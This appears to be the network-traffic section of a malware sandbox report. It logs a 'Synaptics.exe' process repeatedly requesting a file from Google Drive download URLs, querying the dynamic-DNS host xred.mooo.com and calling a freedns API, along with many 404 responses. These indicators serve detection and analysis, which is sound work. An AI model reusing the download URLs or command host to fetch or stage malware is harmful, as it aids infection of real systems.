                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                              Source: global trafficHTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1User-Agent: MyAppHost: freedns.afraid.orgCache-Control: no-cache
                              Source: global trafficDNS traffic detected: DNS query: docs.google.com
                              Source: global trafficDNS traffic detected: DNS query: xred.mooo.com
                              Source: global trafficDNS traffic detected: DNS query: freedns.afraid.org
                              Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5LW8KWFdf7WMzgVOKWjf4IF7bNdIVOTWuexsLEbEaKfG80j5InKOJtoOk2-WuWZ0K5Drig-y8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:06 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-EVdNpbwuN1QWJcBMFv02Hw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerSet-Cookie: NID=520=ZX-DgLx8DKxqDSlyJFwMa40N-uOHIM4QJVTA_CoSWoPbU-m3uXi8BgemBWWBptEBpCCT7Rgt7WkVLTuyzu5xzaI92UcZ3ld7qutOfbNbCY3XbsR2udSNwxhnxf5MnRl8K4aUcSMKwK1fp9TXjgLnLD_puVz1kdUtxl9BQgyVE9NwVV9H-M0ZuQ8-; expires=Tue, 01-Jul-2025 10:23:06 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5cqaWD6d3q0rH-Yt_a05ogvdWVub7xbkK1pfZGrJjOX76v1U7RxU25f4gUBPtk0hbkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:06 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-utEZa2iZsmkq8k0AkcQ0kg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=jSaTa8KuE5l7N4TCIhcrmQMzAXxHbxrS3uxNWo8NBA5sjdlnarGAVbeVVp3-A4J0ZNfe8x2LprxczA5Zgjwq8P8WJXY5VGantWu1oKxYA1QMxzCQ7bqV7fTRHpbkdnMXWNQunQ-1buzm1q0QryipZRTuj1Q6CZLOsIGqqZrTdLLLnMnctG8dcdJ4; expires=Tue, 01-Jul-2025 10:23:06 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4MUBlZl7tlL72SC1mwTP1RtQhE6wrODIp8x7IMwH872yfWmZjz1P-0a7bsgijVze9_q8Zv1jMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:07 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-LmRmpc2s4cIEWb7eFbGWWQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB; expires=Tue, 01-Jul-2025 10:23:07 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7rjjA8IbwYU2n2lgHjwstck9YCiEedBvToUDa3C3XjDvhH8Pq7ujbkFvaUhAX_GDBz3nZREfkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:07 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-SSobHbL1VTkE-3_IYqw00A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6ze6xarUd4btSy2zfLfp15Ul1QlsGTBHIsq3LmUT5KSpde0L-8Rxo5Ta95nEIHw_4kContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:10 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-qvdofiLoKEMrJQAFS2NbaQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6rSqy7xzHkTkjdn5P-MkO5yymamI38df59wzjAIo_3P1gaXqwAKwwjg1oOr9IXIbozContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:10 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-PYjB6A3Yo_M-aFospdP96w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC77M_I40sL7sAN07boDTTQ6Kg1UzZ4PLadHPoEc3GoMTkobyi9ewKL3QFiHqvfqd4-lFVFR7OkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:11 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-4t7u_gD_GtVsSwf5ekFksw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5Uv6yhigimRTMEpP-qy4HWwYqvycpBA3u67CjejVuS0MlXSYMCDIxQwQJvaW-4jXjDContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:11 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-qF12cW335bJDFIzs_O2L9A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4GF9Y45-KPByo5NRTVd0HxIQZVqFqnlcB6_xJvW7KR-aptmL7Pd3XfB2uu7ScAiNNTWoFn01MContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:13 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-PUq9l4zQOIWRR5xMvQDUGA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5OdNQT4lZuEo8cQMk_hcJ1-aA2_iEWbjW7jRh-H0d4P7Fej2lKpleZrxPWj6prueBuD8G14lUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:14 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-QJhf_BMw94pBrg7RnOCO3A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7klrstWaAIVAR_hsm0jmZROZA-pF8YXAmO3dKJXN-7-zEANOrdPV19-R2l-RHbQsyFCIsMDwUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:14 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-lSaWpbEL5-n2JFX2_k8KWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6YS6OcP-58oIoOTy1-OU39GSZDZ9AcIAhTC5HisoIKfqAEMIXOdeKnP6oPCDEK2ZOdContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:15 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-CXqyOhE7v4xNR9mGVzc0bA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5Z4P3avfBG68kaakywAWo0D4olB3OYZ3h4joyVWsUjyI1FvodoeuEcd76Z8tLoQUj3V-x8fJQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:15 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-cL3jY0DY5eSwx2XUiIBHJQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5NlPf77H95aFktjKQKcbA_Ze9gfSujdXXHRJGFSJ-7blKvJh0kUYub9GoabjdkTWtMsNLgARYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:18 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-bpq8664In8p0MgBiYt_2rQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4N65YpwYZjP31z5M0zcce2zYlEOuDq8V_SG4IpFmwSDAiyQh6RcYvyKHR2YJi3otPTDCfKeOgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:18 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-43vGkHfn5CAi81PUAVue3A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC67q00C5o_iFOdziiaR8j4UF2FaCVSMZGyb9EXjcE92JYRxbxlUTvNDiYky6tUoOVUOtSOZ9fIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:19 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-XP8sndq2gKVeH2CbBIJ_aw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7MdkIb6jfZdquRZH2DutGXlT2pXQoze3zO1jqmm4-YD2lIq9-mWBCa9Rxxo-2tStEU49s3298Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:19 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-nllpoLKxVhNqGPZ_Xi1waw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
